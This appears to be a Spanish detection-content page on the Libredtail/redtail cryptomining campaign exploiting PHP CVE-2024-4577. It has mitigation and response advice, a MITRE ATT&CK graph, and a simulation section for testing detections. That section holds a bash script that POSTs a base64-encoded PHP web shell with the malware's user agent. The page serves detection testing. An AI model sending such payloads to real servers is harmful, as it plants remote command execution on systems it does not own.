Libredtail Explota la CVE-2024-4577 para la Criptominería
Seguir 
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
El artículo detalla una campaña de criptominería que involucra a la familia de malware redtail, la cual se entrega a través de solicitudes HTTP que explotan CVE-2024-4577 en PHP. Los actores de la amenaza envían cargas útiles codificadas en Base64 que recuperan y ejecutan un script autorreplicante llamado cve_2024_4577.selfrep. La actividad está dirigida a servidores web vulnerables y se acompaña de intentos de inicio de sesión SSH que dependen de credenciales predeterminadas para expandir el acceso.
Investigación
El investigador observó varias direcciones IP de Alemania, el Reino Unido e India enviando una secuencia de cuatro solicitudes HTTP POST diseñadas para atravesar hasta /bin/sh, usar wget or curl para descargar un script de shell, y activar el CVE-2024-4577 exploit. Cuando tiene éxito, el ataque deja caer un .redtail binario oculto y termina los servicios de criptominería en competencia que ya están ejecutándose en el host. La investigación también registró intentos de inicio de sesión SSH usando credenciales como admin/admin, junto con actividad de escaneado SYN.
Mitigación
Las organizaciones deben actualizar las instalaciones de PHP a las versiones que aborden CVE-2024-4577, bloquear el agente de usuario libredtail-http en el perímetro, y desplegar reglas WAF que nieguen solicitudes que contengan /sh o el patrón de carga útil de exploit conocido. El acceso SSH debe ser reforzado mediante la aplicación de autenticación basada en claves y la deshabilitación de credenciales predeterminadas o débiles. También se recomienda monitorear el tráfico de salida sospechoso hacia direcciones IP desconocidas.
Respuesta
Cuando se activan detecciones, los defensores deben aislar el sistema afectado, recopilar artefactos forenses como el cve_2024_4577.selfrep script y el .redtail binario, y eliminar cualquier trabajo cron o tarea programada creada por el malware. Los equipos de seguridad deberían entonces inventariar las aplicaciones PHP en todo el entorno y aplicar los parches necesarios. Los registros SSH también deben ser revisados en busca de señales de abuso de credenciales o acceso no autorizado.
"graph TB %% Class definitions classDef technique fill:#99ccff %% Nodes u2013 MITRE ATT&CK Techniques tech_exploit_app["<b>Technique</b> – <b>T1190 Exploit Public-Facing Application</b><br/><b>Description</b>: Adversaries may exploit a publicu2011facing application to gain initial access."] class tech_exploit_app technique tech_content_injection["<b>Technique</b> – <b>T1659 Content Injection</b><br/><b>Description</b>: Adversary injects malicious content such as a PHP payload into a web application to achieve code execution."] class tech_content_injection technique tech_deobfuscate["<b>Technique</b> – <b>T1140 Deobfuscate/Decode Files or Information</b><br/><b>Description</b>: Adversaries decode or deobfuscate data (e.g., Base64) to reveal commands or payloads."] class tech_deobfuscate technique tech_unix_shell["<b>Technique</b> – <b>T1059.004 Unix Shell</b><br/><b>Description</b>: Adversaries use a Unix shell to execute commands such as wget, curl, or sh for downloading and running malicious code."] class tech_unix_shell technique tech_hidden_file["<b>Technique</b> – <b>T1564.001 Hidden Files and Directories</b><br/><b>Description</b>: Adversaries create hidden files or directories (e.g., .redtail) to conceal malicious artifacts."] class tech_hidden_file technique tech_compute_hijack["<b>Technique</b> – <b>T1496.001 Compute Hijacking</b><br/><b>Description</b>: Adversaries hijack system compute resources to perform unauthorized cryptomining."] class tech_compute_hijack technique tech_brute_force["<b>Technique</b> – <b>T1110.001 Password Guessing</b><br/><b>Description</b>: Adversaries attempt credential guessing (e.g., SSH admin/admin) to obtain valid credentials."] class tech_brute_force technique tech_network_discovery["<b>Technique</b> – <b>T1046 Network Service Discovery</b><br/><b>Description</b>: Adversaries perform scans (e.g., SYN scans) to discover active network services and open ports."] class tech_network_discovery technique tech_obfuscate["<b>Technique</b> – <b>T1027 Obfuscated Files or Information</b><br/><b>Description</b>: Adversaries encode or otherwise obfuscate files (e.g., Base64 encoded POST body) to evade detection."] class tech_obfuscate technique %% Connections showing attack flow tech_exploit_app –>|leads_to| tech_content_injection tech_content_injection –>|leads_to| tech_deobfuscate tech_deobfuscate –>|leads_to| tech_unix_shell tech_unix_shell –>|leads_to| tech_hidden_file tech_hidden_file –>|leads_to| tech_compute_hijack tech_exploit_app –>|also_triggers| tech_brute_force tech_brute_force –>|leads_to| tech_network_discovery tech_unix_shell –>|enables| tech_obfuscate "
Flujo de Ataque
Detecciones
Carga / Descarga remota de archivos a través de herramientas estándar (vía línea de comandos)
Ver
IOCs (IP de origen) para detectar: Peligro de Libredtail
Ver
IOCs (IP de destino) para detectar: Peligro de Libredtail
Ver
Detección de actividad maliciosa de Libredtail-HTTP [Servidor web]
Ver
Ejecución de simulación
Prerrequisito: La verificación previa de telemetría y línea de base debe haber pasado.
Razonamiento: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTP identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección.
-
Narrativa de ataque y comandos:
Un adversario ha conseguido un punto de apoyo en un servidor web comprometido y desea establecer persistencia utilizando el Libredtail‑HTTP web‑shell. Elaboran un HTTP POST malicioso que:- Usa el distintivo agente de usuario libredtail‑http (ayuda al malware a identificar su propio tráfico).
- Incluye una consulta URL con /bin/sh para indicar una solicitud de ejecución de comando y la directiva PHP allow_url_include=1 para permitir la inclusión de código remoto.
- Envía una carga útil codificada en base64 en el cuerpo de la solicitud que contiene el código PHP
<?php system($_GET['cmd']); ?>(ofuscación – T1027). - Establece un encabezado personalizado Ejecución-Script: apache.selfrep que Libredtail‑HTTP usa internamente para autorreplicarse (coincide con
ejecución_script|contiene).
El servidor, al procesar esta solicitud, decodifica la carga útil, escribe un archivo PHP malicioso en el directorio raíz web y posteriormente ejecuta comandos recibidos a través de
/bin/sh, estableciendo un canal cifrado de regreso al atacante (T1573). -
Script de prueba de regresión:
#!/usr/bin/env bash # ------------------------------------------------- # Simulación de solicitud maliciosa de Libredtail-HTTP # ------------------------------------------------- TARGET="http://localhost/upload.php" USER_AGENT="libredtail-http" MALICIOUS_PAYLOAD=$(echo -n '<?php system($_GET["cmd"]); ?>' | base64) curl -X POST "$TARGET?dir=/bin/sh&allow_url_include=1" -H "User-Agent: $USER_AGENT" -H "Script-Execution: apache.selfrep" -H "Content-Type: application/x-www-form-urlencoded" --data "payload=$MALICIOUS_PAYLOAD&marker=cve_2024_4577.selfrep" # La solicitud debería crear/sobrescribir un shell PHP en el servidor.Ejecute el script en una máquina que pueda alcanzar el servidor web objetivo. Después de la ejecución, verifique que se dispare la alerta en el SIEM.
-
Comandos de limpieza:
#!/usr/bin/env bash # Eliminar el shell PHP malicioso creado por la prueba CLEANUP_TARGET="http://localhost/cleanup.php" curl -X POST "$CLEANUP_TARGET" -H "User-Agent: libredtail-http" -d "file=uploaded_shell.php"Se asume que el endpoint de limpieza existe para fines de prueba; reemplace con comandos de eliminación del sistema de archivos apropiados si tiene acceso directo al host.